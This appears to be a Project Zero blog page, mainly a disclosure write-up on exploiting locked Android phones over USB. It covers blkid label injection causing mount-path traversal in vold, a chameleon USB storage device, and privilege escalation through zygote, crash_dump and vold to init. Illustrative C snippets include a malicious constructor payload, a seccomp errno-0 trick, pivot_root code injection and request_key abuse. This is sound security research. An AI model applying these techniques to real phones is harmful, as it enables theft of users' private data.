https://security-tracker.debian.org/tracker/CVE-2018-17182
https://people.canonical.com/~ubuntu-security/cve/2018/CVE-2018-17182.html
Fedora pushed an update to users on 2018-09-22: https://bugzilla.redhat.com/show_bug.cgi?id=1631206#c8
Conclusion
This exploit shows how much impact the kernel configuration can have on how easy it is to write an exploit for a kernel bug. While simply turning on every security-related kernel configuration option is probably a bad idea, some of them - like the kernel.dmesg_restrict sysctl - seem to provide a reasonable tradeoff when enabled.
The fix timeline shows that the kernel's approach to handling severe security bugs is very efficient at quickly landing fixes in the git master tree, but leaves a window of exposure between the time an upstream fix is published and the time the fix actually becomes available to users - and this time window is sufficiently large that a kernel exploit could be written by an attacker in the meantime.

OATmeal on the Universal Cereal Bus: Exploiting Android phones over USB

Mon, 09/10/2018 - 12:18
Posted by Jann Horn, Google Project Zero
Recently, there has been some attention around the topic of physical attacks on smartphones, where an attacker with the ability to connect USB devices to a locked phone attempts to gain access to the data stored on the device. This blogpost describes how such an attack could have been performed against Android devices (tested with a Pixel 2).
After an Android phone has been unlocked once on boot (on newer devices, using the "Unlock for all features and data" screen; on older devices, using the "To start Android, enter your password" screen), it retains the encryption keys used to decrypt files in kernel memory even when the screen is locked, and the encrypted filesystem areas or partition(s) stay accessible. Therefore, an attacker who gains the ability to execute code on a locked device in a sufficiently privileged context can not only backdoor the device, but can also directly access user data.

(Caveat: We have not looked into what happens to work profile data when a user who has a work profile toggles off the work profile.)
The bug reports referenced in this blogpost, and the corresponding proof-of-concept code, are available at:
https://bugs.chromium.org/p/project-zero/issues/detail?id=1583 ("directory traversal over USB via injection in blkid output")
https://bugs.chromium.org/p/project-zero/issues/detail?id=1590 ("privesc zygote->init; chain from USB")
These issues were fixed as CVE-2018-9445 (fixed at patch level 2018-08-01) and CVE-2018-9488 (fixed at patch level 2018-09-01).
The attack surface
Many Android phones support USB host mode (often using OTG adapters). This allows phones to connect to many types of USB devices (this list isn't necessarily complete):
  • USB sticks: When a USB stick is inserted into an Android phone, the user can copy files between the system and the USB stick. Even if the device is locked, Android versions before P will still attempt to mount the USB stick. (Android 9, which was released after these issues were reported, has logic in vold that blocks mounting USB sticks while the device is locked.)
  • USB keyboards and mice: Android supports using external input devices instead of using the touchscreen. This also works on the lockscreen (e.g. for entering the PIN).
  • USB ethernet adapters: When a USB ethernet adapter is connected to an Android phone, the phone will attempt to connect to a wired network, using DHCP to obtain an IP address. This also works if the phone is locked.

This blogpost focuses on USB sticks. Mounting an untrusted USB stick offers nontrivial attack surface in highly privileged system components: The kernel has to talk to the USB mass storage device using a protocol that includes a subset of SCSI, parse its partition table, and interpret partition contents using the kernel's filesystem implementation; userspace code has to identify the filesystem type and instruct the kernel to mount the device to some location. On Android, the userspace implementation for this is mostly in vold (one of the processes that are considered to have kernel-equivalent privileges), which uses separate processes in restrictive SELinux domains to e.g. determine the filesystem types of partitions on USB sticks.
The bug (part 1): Determining partition attributes
When a USB stick has been inserted and vold has determined the list of partitions on the device, it attempts to identify three attributes of each partition: label (a user-readable string describing the partition), UUID (a unique identifier that can be used to determine whether the USB stick is one that has been inserted into the device before), and filesystem type. In the modern GPT partitioning scheme, these attributes can mostly be stored in the partition table itself; however, USB sticks tend to use the MBR partition scheme instead, which cannot store UUIDs and labels. For normal USB sticks, Android supports both the MBR partition scheme and the GPT partition scheme.
To provide the ability to label partitions and assign UUIDs to them even when the MBR partition scheme is used, filesystems implement a hack: The filesystem header contains fields for these attributes, allowing an implementation that has already determined the filesystem type and knows the filesystem header layout of the specific filesystem to extract this information in a filesystem-specific manner. When vold wants to determine label, UUID and filesystem type, it invokes /system/bin/blkid in the blkid_untrusted SELinux domain, which does exactly this: First, it attempts to identify the filesystem type using magic numbers and (failing that) some heuristics, and then, it extracts the label and UUID. It prints the results to stdout in the following format:
/dev/block/sda1: LABEL="<label>" UUID="<uuid>" TYPE="<type>"
However, the version of blkid used by Android did not escape the label string, and the code responsible for parsing blkid's output only scanned for the first occurrences of UUID=" and TYPE=". Therefore, by creating a partition with a crafted label, it was possible to gain control over the UUID and type strings returned to vold, which would otherwise always be a valid UUID string and one of a fixed set of type strings.
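For illustration, consider a hypothetical partition whose label is the string 'UUID="../##'. The blkid output line would then look something like this (hypothetical output, not captured from a real device):

/dev/block/sda1: LABEL="UUID="../##" UUID="1234-ABCD" TYPE="vfat"

A parser that simply scans for the first occurrence of UUID=" extracts ../## instead of the partition's real UUID.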
The bug (part 2): Mounting the filesystem
When vold has determined that a newly inserted USB stick with an MBR partition table contains a partition of type vfat that the kernel's vfat filesystem implementation should be able to mount, PublicVolume::doMount() constructs a mount path based on the filesystem UUID, then attempts to ensure that the mountpoint directory exists and has appropriate ownership and mode, and then attempts to mount over that directory:

    if (mFsType != "vfat") {
        LOG(ERROR) << getId() << " unsupported filesystem " << mFsType;
        return -EIO;
    }
    if (vfat::Check(mDevPath)) {
        LOG(ERROR) << getId() << " failed filesystem check";
        return -EIO;
    }
    // Use UUID as stable name, if available
    std::string stableName = getId();
    if (!mFsUuid.empty()) {
        stableName = mFsUuid;
    }
    mRawPath = StringPrintf("/mnt/media_rw/%s", stableName.c_str());
    [...]
    if (fs_prepare_dir(mRawPath.c_str(), 0700, AID_ROOT, AID_ROOT)) {
        PLOG(ERROR) << getId() << " failed to create mount points";
        return -errno;
    }
    if (vfat::Mount(mDevPath, mRawPath, false, false, false,
            AID_MEDIA_RW, AID_MEDIA_RW, 0007, true)) {
        PLOG(ERROR) << getId() << " failed to mount " << mDevPath;
        return -EIO;
    }
The mount path is determined using a format string, without any sanity checks on the UUID string that was provided by blkid. Therefore, an attacker with control over the UUID string can perform a directory traversal attack and cause the FAT filesystem to be mounted outside of /mnt/media_rw.
This means that if an attacker inserts a USB stick with a FAT filesystem whose label string is 'UUID="../##' into a locked phone, the phone will mount that USB stick to /mnt/##.
However, this straightforward implementation of the attack has several severe limitations; some of them can be overcome, others worked around:
  • Label string length: A FAT filesystem label is limited to 11 bytes. An attacker attempting to perform a straightforward attack needs to use the six bytes 'UUID="' to start the injection, which leaves only five characters for the directory traversal - insufficient to reach any interesting point in the mount hierarchy. The next section describes how to work around that.
  • SELinux restrictions on mountpoints: Even though vold is considered to be kernel-equivalent, a SELinux policy applies some restrictions on what vold can do. Specifically, the mounton permission is restricted to a set of permitted labels.
  • Writability requirement: fs_prepare_dir() fails if the target directory is not mode 0700 and chmod() fails.
  • Restrictions on access to vfat filesystems: When a vfat filesystem is mounted, all of its files are labeled as u:object_r:vfat:s0. Even if the filesystem is mounted in a place from which important code or data is loaded, many SELinux contexts won't be permitted to actually interact with the filesystem - for example, the zygote and system_server aren't allowed to do so. On top of that, processes that don't have sufficient privileges to bypass DAC checks also need to be in the media_rw group. The section "Dealing with SELinux: Triggering the bug twice" describes how these restrictions can be avoided in the context of this specific bug.
Exploitation: Chameleonic USB mass storage
As described in the previous section, a FAT filesystem label is limited to 11 bytes. blkid supports a range of other filesystem types that have significantly longer label strings, but if you used such a filesystem type, you'd then have to make it past the fsck check for vfat filesystems and the filesystem header checks performed by the kernel when mounting a vfat filesystem. The vfat kernel filesystem doesn't require a fixed magic value right at the start of the partition, so this might theoretically work somehow; however, because several of the values in a FAT filesystem header are actually important for the kernel, and at the same time, blkid also performs some sanity checks on superblocks, the PoC takes a different route.
After blkid has read parts of the filesystem and used them to determine the filesystem's type, label and UUID, fsck_msdos and the in-kernel filesystem implementation will re-read the same data, and those repeated reads actually go through to the storage device. The Linux kernel caches block device pages when userspace directly interacts with block devices, but __blkdev_put() removes all cached data associated with a block device when the last open file referencing the device is closed.
A physical attacker can abuse this by attaching a fake storage device that returns different data for multiple reads from the same location. This allows us to present, for example, a romfs header with a long label string to blkid while presenting a perfectly normal vfat filesystem to fsck_msdos and the in-kernel filesystem implementation.
This is relatively simple to implement in practice thanks to Linux' built-in support for device-side USB. Andrzej Pietrasiewicz's talk "Make your own USB gadget" is a useful introduction to this topic. Basically, the kernel ships with implementations for device-side USB mass storage, HID devices, ethernet adapters, and more; using a relatively simple pseudo-filesystem-based configuration interface, you can configure a composite gadget that provides one or multiple of these functions, potentially with multiple instances, to the connected device. The hardware you need is a system that runs Linux and supports device-side USB; for testing this attack, a Raspberry Pi Zero W was used.
The f_mass_storage gadget function is designed to use a normal file as backing storage; to be able to interactively respond to requests from the Android phone, a FUSE filesystem is used as backing storage instead, using the direct_io option / the FOPEN_DIRECT_IO flag to ensure that our own kernel doesn't add unwanted caching.
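A toy model of this chameleon behavior (illustration only - the real PoC implements it as a FUSE read handler behind the f_mass_storage gadget, and the image contents are elided here):

#include <string.h>

#define BLOCK   512
#define NBLOCKS 4

static unsigned char romfs_image[NBLOCKS * BLOCK]; /* shown to blkid (long label) */
static unsigned char vfat_image[NBLOCKS * BLOCK];  /* shown to fsck_msdos / kernel */
static unsigned read_count[NBLOCKS];

/* serve a different image for the first read of a block than for later reads */
static void device_read(unsigned char *buf, unsigned blk) {
    const unsigned char *src = (read_count[blk]++ == 0) ? romfs_image : vfat_image;
    memcpy(buf, src + blk * BLOCK, BLOCK);
}

int main(void) {
    unsigned char buf[BLOCK];
    device_read(buf, 0); /* blkid's first read sees the romfs header */
    device_read(buf, 0); /* the kernel's later read sees the vfat header */
    return 0;
}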
At this point, it is already possible to implement an attack that can steal, for example, photos stored on external storage. Luckily for an attacker, immediately after a USB stick has been mounted, com.android.externalstorage/.MountReceiver is launched, which is a process whose SELinux domain permits access to USB devices. So after a malicious FAT partition has been mounted over /data (using the label string 'UUID="../../data'), the zygote forks off a child with appropriate SELinux context and group membership to permit accesses to USB devices. This child then loads bytecode from /data/dalvik-cache/, permitting us to take control over com.android.externalstorage, which has the necessary privileges to exfiltrate external storage contents.
However, for an attacker who wants to access not just photos, but things like chat logs or authentication credentials stored on the device, this level of access should normally not be sufficient on its own.
Dealing with SELinux: Triggering the bug twice
The major limiting factor at this point is that, even though it is possible to mount over /data, a lot of the highly-privileged code running on the device is not permitted to access the mounted filesystem. However, one highly-privileged service does have access to it: vold.
vold actually supports two types of USB sticks, PublicVolume and PrivateVolume. Up to this point, this blogpost focused on PublicVolume; from here on, PrivateVolume becomes important.

A PrivateVolume is a USB stick that must be formatted using a GUID Partition Table. It must contain a partition that has type UUID kGptAndroidExpand (193D1EA4-B3CA-11E4-B075-10604B889DCF), which contains a dm-crypt-encrypted ext4 (or f2fs) filesystem. The corresponding key is stored at /data/misc/vold/expand_{partGuid}.key, where {partGuid} is the partition GUID from the GPT table as a normalized lowercase hexstring.
As an attacker, it normally shouldn't be possible to mount an ext4 filesystem this way because phones aren't usually set up with any such keys; and even if there is such a key, you'd still have to know what the correct partition GUID is and what the key is. However, we can mount a vfat filesystem over /data/misc and put our own key there, for our own GUID. Then, while the first malicious USB mass storage device is still connected, we can connect a second one that is mounted as PrivateVolume using the keys vold will read from the first USB mass storage device. (Technically, the ordering in the last sentence isn't entirely correct - actually, the exploit provides both mass storage devices as a single composite device at the same time, but stalls the first read from the second mass storage device to create the desired ordering.)
Because PrivateVolume instances use ext4, we can control DAC ownership and permissions on the filesystem; and thanks to the way a PrivateVolume is integrated into the system, we can even control SELinux labels on that filesystem.
In summary, at this point, we can mount a controlled filesystem over /data, with arbitrary file permissions and arbitrary SELinux contexts. Because we control file permissions and SELinux contexts, we can allow any process to access files on our filesystem - including mapping them with PROT_EXEC.
Injecting into zygote
The zygote process is relatively powerful, even though it is not listed as part of the TCB. By design, it runs with UID 0, can arbitrarily change its UID, and can perform dynamic SELinux transitions into the SELinux contexts of system_server and normal apps. In other words, the zygote has access to almost all user data on the device.
When the 64-bit zygote starts up on system boot, it loads code from /data/dalvik-cache/arm64/system@framework@boot*.{art,oat,vdex}. Normally, the oat file (which contains an ELF library that will be loaded with dlopen()) and the vdex file are symlinks to files on the immutable /system partition; only the art file is actually stored on /data. But we can instead make system@framework@boot.art and system@framework@boot.vdex symlinks to /system (to get around some consistency checks without knowing exactly which Android build is running on the device) while placing our own malicious ELF library at system@framework@boot.oat (with the SELinux context that the legitimate oat file would have). Then, by placing a function with __attribute__((constructor)) in our ELF library, we can get code execution in the zygote as soon as it calls dlopen() on startup.
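A minimal sketch of such a payload library - the payload body is obviously a placeholder; the important part is the constructor attribute, which makes the function run during dlopen():

#include <unistd.h>

// compiled as a shared object and placed at
// /data/dalvik-cache/arm64/system@framework@boot.oat
__attribute__((constructor))
static void zygote_payload(void) {
    // executes inside the zygote (UID 0) during its dlopen() on startup;
    // a real exploit would launch its next stage here
    static const char msg[] = "payload running in zygote\n";
    write(STDERR_FILENO, msg, sizeof(msg) - 1);
}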
The missing step at this point is that when the attack is performed, the zygote is already running; and this attack only works while the zygote is starting up.

Crashing the system

This part is a bit unpleasant.
When a critical system component (in particular, the zygote or system_server) crashes (which you can simulate on an eng build using kill), Android attempts to automatically recover from the crash by restarting most userspace processes (including the zygote). When this happens, the screen first shows the boot animation for a bit, followed by the lock screen with the "Unlock for all features and data" prompt that normally only shows up after boot. However, the key material for accessing user data is still present at this point, as you can verify if ADB is on by running "ls /sdcard" on the device.
This means that if we can somehow crash system_server, we can then inject code into the zygote during the following userspace restart and will be able to access user data on the device.
Of course, mounting our own filesystem over /data is very crude and makes all sorts of things fail, but surprisingly, the system doesn't immediately fall over - while parts of the UI become unusable, most places have some error handling that prevents the system from failing so clearly that a restart happens.

After some experimentation, it turned out that Android's code for tracking bandwidth usage has a safety check: If the network usage tracking code can't write to disk and >=2MiB (mPersistThresholdBytes) of network traffic have been observed since the last successful write, a fatal exception is thrown. This means that if we can create some sort of network connection to the device and then send it >=2MiB worth of ping flood, then trigger a stats writeback by either waiting for a periodic writeback or changing the state of a network interface, the device will reboot.
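Sketched in C for consistency with the other snippets (the real check lives in Android's Java network-stats code, so all names here are assumptions), the logic amounts to:

#include <stdlib.h>

#define PERSIST_THRESHOLD_BYTES (2 * 1024 * 1024)  /* mirrors mPersistThresholdBytes */

/* called whenever the stats code tries to persist counters to disk */
static void on_persist_attempt(int write_succeeded, long bytes_since_last_persist) {
    if (!write_succeeded && bytes_since_last_persist >= PERSIST_THRESHOLD_BYTES) {
        /* fatal exception: system_server dies and userspace restarts,
           which re-runs the zygote startup code we want to hijack */
        abort();
    }
}

int main(void) {
    /* simulate: disk writes fail (we mounted over /data) after >=2MiB of traffic */
    on_persist_attempt(0, 3L * 1024 * 1024);
    return 0;
}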
To create a network connection, there are two options:
  • Connect to a wifi network. Before Android 9, even when the device is locked, it is normally possible to connect to a new wifi network by dragging down from the top of the screen, tapping the drop-down below the wifi symbol, then tapping on the name of an open wifi network. (This doesn't work for networks protected with WPA, but of course an attacker can make their own wifi network an open one.) Many devices will also just autoconnect to networks with certain names.
  • Connect to an ethernet network. Android supports USB ethernet adapters and will automatically connect to ethernet networks.

For testing the exploit, a manually-created connection to a wifi network was used; for a more reliable and user-friendly exploit, you'd probably want to use an ethernet connection.
At this point, we can run arbitrary native code in zygote context and access user data; but we can't yet read out the raw disk encryption key, directly access the underlying block device, or take a RAM dump (although at this point, half the data that would've been in a RAM dump is probably gone anyway thanks to the system crash). If we want to be able to do those things, we'll have to escalate our privileges a bit more.

From zygote to vold

Even though the zygote is not supposed to be part of the TCB, it has access to the CAP_SYS_ADMIN capability in the initial user namespace, and the SELinux policy permits the use of this capability. The zygote uses this capability for the mount() syscall and for installing a seccomp filter without setting the NO_NEW_PRIVS flag. There are multiple ways to abuse CAP_SYS_ADMIN; in particular, on the Pixel 2, the following ways seem viable:
  • You can install a seccomp filter without NO_NEW_PRIVS, then perform an execve() with a privilege transition (SELinux exec transition, setuid/setgid execution, or execution with permitted file capability set). The seccomp filter can then force specific syscalls to fail with error number 0 - which e.g. in the case of open() means that the process will believe that the syscall succeeded and allocated file descriptor 0. This attack works here, but is a bit messy; a minimal sketch of the errno-0 trick follows after this list.
  • You can instruct the kernel to use a file you control as a high-priority swap device, then create memory pressure. Once the kernel writes stack or heap pages from a sufficiently privileged process into the swap file, you can edit the swapped-out memory, then let the process load it back. Downsides of this technique are that it is very unpredictable, that it involves memory pressure (which could potentially cause the system to kill processes you want to keep, and probably destroys many forensic artifacts in RAM), and that it requires some way to figure out which swapped-out pages belong to which process and are used for what. It also requires the kernel to support swap.
  • You can use pivot_root() to replace the root directory of either the current mount namespace or a newly created mount namespace, bypassing the SELinux checks that would have been performed for mount(). Doing it for a new mount namespace is useful if you only want to affect a child process that elevates its privileges afterwards. This doesn't work if the root filesystem is a rootfs filesystem. This is the technique used here.

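As an illustration of the errno-0 trick from the first bullet, here is a standalone sketch (demonstration code, not the exploit itself; without CAP_SYS_ADMIN you would additionally need PR_SET_NO_NEW_PRIVS, which is exactly what the zygote gets to skip):

#include <fcntl.h>
#include <linux/filter.h>
#include <linux/seccomp.h>
#include <stddef.h>
#include <stdio.h>
#include <sys/prctl.h>
#include <sys/syscall.h>

int main(void) {
    // filter: make openat() "fail" with error number 0, allow everything else;
    // returning errno 0 means the syscall returns 0, i.e. file descriptor 0
    struct sock_filter filter[] = {
        BPF_STMT(BPF_LD | BPF_W | BPF_ABS,
                 offsetof(struct seccomp_data, nr)),
        BPF_JUMP(BPF_JMP | BPF_JEQ | BPF_K, __NR_openat, 0, 1),
        BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_ERRNO | 0),  // "errno 0"
        BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_ALLOW),
    };
    struct sock_fprog prog = {
        .len = (unsigned short)(sizeof(filter) / sizeof(filter[0])),
        .filter = filter,
    };
    // with CAP_SYS_ADMIN, no PR_SET_NO_NEW_PRIVS is needed here
    if (prctl(PR_SET_SECCOMP, SECCOMP_MODE_FILTER, &prog) != 0) {
        perror("prctl");
        return 1;
    }
    // on arm64 (and with modern libcs generally), open() goes through openat()
    int fd = open("/nonexistent", O_RDONLY);
    printf("open() returned %d\n", fd);  // prints 0: the caller sees "success"
    return 0;
}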
In recent Android versions, the mechanism used to create dumps of crashing processes has changed: Instead of asking a privileged daemon to create a dump, processes execute one of the helpers /system/bin/crash_dump64 and /system/bin/crash_dump32, which have the SELinux label u:object_r:crash_dump_exec:s0. Currently, when a file with such a label is executed by any SELinux domain, an automatic domain transition to the crash_dump domain is triggered (which automatically implies setting the AT_SECURE flag in the auxiliary vector, instructing the linker of the new process to be careful with environment variables like LD_PRELOAD):
https://android.googlesource.com/platform/system/sepolicy/+/master/private/domain.te#1:

domain_auto_trans(domain, crash_dump_exec, crash_dump);
At the time this bug was reported, the crash_dump domain had the following SELinux policy:
https://android.googlesource.com/platform/system/sepolicy/+/a3b3bdbb2fdbb4c540ef4e6c3ba77f5723ccf46d/public/crash_dump.te:

[...]
allow crash_dump {
  domain
  -init
  -crash_dump
  -keystore
  -logd
}:process { ptrace signal sigchld sigstop sigkill };
[...]
r_dir_file(crash_dump, domain)
[...]
This policy permitted crash_dump to attach to processes in almost any domain via ptrace() (providing the ability to take over the process if the DAC controls permit it) and allowed it to read properties of any process in procfs. The exclusion list for ptrace access lists a few TCB processes; but notably, vold was not on the list. Therefore, if we can execute crash_dump64 and somehow inject code into it, we can then take over vold.
Note that the ability to actually ptrace() a process is still gated by the normal Linux DAC checks, and crash_dump can't use CAP_SYS_PTRACE or CAP_SETUID. If a normal app managed to inject code into crash_dump64, it still wouldn't be able to leverage that to attack system components because of the UID mismatch.
If you've been reading carefully, you might now wonder whether we could just place our own binary with context u:object_r:crash_dump_exec:s0 on our fake /data filesystem, and then execute that to gain code execution in the crash_dump domain. This doesn't work because vold - very sensibly - hardcodes the MS_NOSUID flag when mounting USB storage devices, which not only degrades the execution of classic setuid/setgid binaries, but also degrades the execution of files with file capabilities and executions that would normally involve automatic SELinux domain transitions (unless the SELinux policy explicitly opts out of this behavior by granting PROCESS2__NOSUID_TRANSITION).
To inject code into crash_dump64, we can create a new mount namespace with unshare() (using our CAP_SYS_ADMIN capability), then call pivot_root() to point the root directory of our process into a directory we fully control, and then execute crash_dump64. Then the kernel parses the ELF headers of crash_dump64, reads the path to the linker (/system/bin/linker64), loads the linker into memory from that path (relative to the process root, so we can supply our own linker here), and executes it.
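A minimal sketch of this step, assuming CAP_SYS_ADMIN and a prepared directory /fakeroot whose system/bin/linker64 is the malicious "linker". All paths other than the crash_dump64 and linker64 locations are assumptions; in particular, bind-mounting the genuine crash_dump64 into the fake root is just one plausible way to keep it reachable after the pivot:

#define _GNU_SOURCE
#include <sched.h>
#include <sys/mount.h>
#include <sys/syscall.h>
#include <unistd.h>

int main(void) {
    // new mount namespace, so the pivot only affects this process tree
    if (unshare(CLONE_NEWNS) != 0)
        return 1;
    // pivot_root() requires new_root to be a mount point
    if (mount("/fakeroot", "/fakeroot", NULL, MS_BIND, NULL) != 0)
        return 1;
    // bind the genuine crash_dump64 (crash_dump_exec label, on a filesystem
    // mounted without MS_NOSUID) over a placeholder file in the fake root;
    // /fakeroot/system/bin/linker64 is the attacker-controlled "linker"
    if (mount("/system/bin/crash_dump64",
              "/fakeroot/system/bin/crash_dump64", NULL, MS_BIND, NULL) != 0)
        return 1;
    // /fakeroot/oldroot is an empty directory prepared in advance
    if (syscall(SYS_pivot_root, "/fakeroot", "/fakeroot/oldroot") != 0)
        return 1;
    if (chdir("/") != 0)
        return 1;
    // the exec auto-transitions into the crash_dump domain; the kernel then
    // loads PT_INTERP (/system/bin/linker64) relative to the new root
    char *const argv[] = { (char *)"crash_dump64", NULL };
    execve("/system/bin/crash_dump64", argv, NULL);
    return 1;  // execve() only returns on failure
}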
At this point, we can execute arbitrary code in crash_dump context and escalate into vold from there, compromising the TCB. Android's security policy now considers us to have kernel-equivalent privileges; however, to see what you'd have to do from here to gain code execution in the kernel, this blogpost goes a bit further.

From vold to init context

It doesn't look like there is an easy way to get from vold into the real init process; however, there is a way into the init SELinux context. Looking through the SELinux policy for allowed transitions into init context, we find the following policy:
https://android.googlesource.com/platform/system/sepolicy/+/master/private/kernel.te:

domain_auto_trans(kernel, init_exec, init)
This means that if we can get code running in kernel context to execute a file we control labeled init_exec, on a filesystem that wasn't mounted with MS_NOSUID, then our file will be executed in init context.
The only code that is running in kernel context is the kernel, so we have to get the kernel to execute the file for us. Linux has a mechanism called "usermode helpers" that can do this: Under some circumstances, the kernel will delegate actions (such as creating coredumps, loading key material into the kernel, performing DNS lookups, ...) to userspace code. In particular, when a nonexistent key is looked up (e.g. via request_key()), /sbin/request-key (hardcoded, can only be changed to a different static path at kernel build time with CONFIG_STATIC_USERMODEHELPER_PATH) will be invoked.
Being in vold, we can simply mount our own ext4 filesystem over /sbin without MS_NOSUID, then call request_key(), and the kernel invokes our request-key in init context.
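A minimal sketch of this final step, assuming vold privileges and a prepared ext4 image (the loop device path and the key parameters are placeholders; request_key() here comes from libkeyutils):

#include <keyutils.h>   // request_key(); link with -lkeyutils
#include <stdio.h>
#include <sys/mount.h>

int main(void) {
    // the ext4 image contains a malicious /sbin/request-key labeled init_exec
    if (mount("/dev/block/loop7", "/sbin", "ext4",
              0 /* deliberately no MS_NOSUID */, "") != 0) {
        perror("mount");
        return 1;
    }
    // looking up a key that doesn't exist makes the kernel spawn
    // /sbin/request-key as a usermode helper - in init context
    request_key("user", "nonexistent-description", NULL,
                KEY_SPEC_PROCESS_KEYRING);
    return 0;
}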
The exploit stops at this point; however, the following section describes how you could build on it to gain code execution in the kernel.

From init context to the kernel

From init context, it is possible to transition into modprobe or vendor_modprobe context by executing an appropriately labeled file after explicitly requesting a domain transition (note that this is domain_trans(), which permits a transition on exec, not domain_auto_trans(), which automatically performs a transition on exec):
domain_trans(init, { rootfs toolbox_exec }, modprobe)
domain_trans(init, vendor_toolbox_exec, vendor_modprobe)
modprobe and vendor_modprobe have the ability to load kernel modules from appropriately labeled files:
allow modprobe self:capability sys_module;
allow modprobe { system_file }:system module_load;
allow vendor_modprobe self:capability sys_module;
allow vendor_modprobe { vendor_file }:system module_load;
Android nowadays doesn't require signatures for kernel modules:
walleye:/ # zcat /proc/config.gz | grep MODULE
CONFIG_MODULES_USE_ELF_RELA=y
CONFIG_MODULES=y
# CONFIG_MODULE_FORCE_LOAD is not set
CONFIG_MODULE_UNLOAD=y
CONFIG_MODULE_FORCE_UNLOAD=y
CONFIG_MODULE_SRCVERSION_ALL=y
# CONFIG_MODULE_SIG is not set
# CONFIG_MODULE_COMPRESS is not set
CONFIG_MODULES_TREE_LOOKUP=y
CONFIG_ARM64_MODULE_CMODEL_LARGE=y
CONFIG_ARM64_MODULE_PLTS=y
CONFIG_RANDOMIZE_MODULE_REGION_FULL=y
CONFIG_DEBUG_SET_MODULE_RONX=y
Therefore, you could execute an appropriately labeled file to execute code in modprobe context, then load an appropriately labeled malicious kernel module from there.

Lessons learned

Notably, this attack crosses two weakly-enforced security boundaries: the boundary from blkid_untrusted to vold (when vold uses the UUID provided by blkid_untrusted in a pathname without checking that it resembles a valid UUID), and the boundary from the zygote to the TCB (by abusing the zygote's CAP_SYS_ADMIN capability). Software vendors have, very rightly, been stressing for quite some time that it is important for security researchers to be aware of what is, and what isn't, a security boundary - but it is also important for vendors to decide where they want to have security boundaries and then rigorously enforce those boundaries. Unenforced security boundaries can be of limited use - for example, as a development aid while stronger isolation is in development - but they can also have negative effects by obfuscating how important a component is for the security of the overall system.
In this case, the weakly-enforced security boundary between vold and blkid_untrusted actually contributed to the vulnerability, rather than mitigating it. If the blkid code had run in the vold process, it would not have been necessary to serialize its output, and the injection of a fake UUID would not have worked.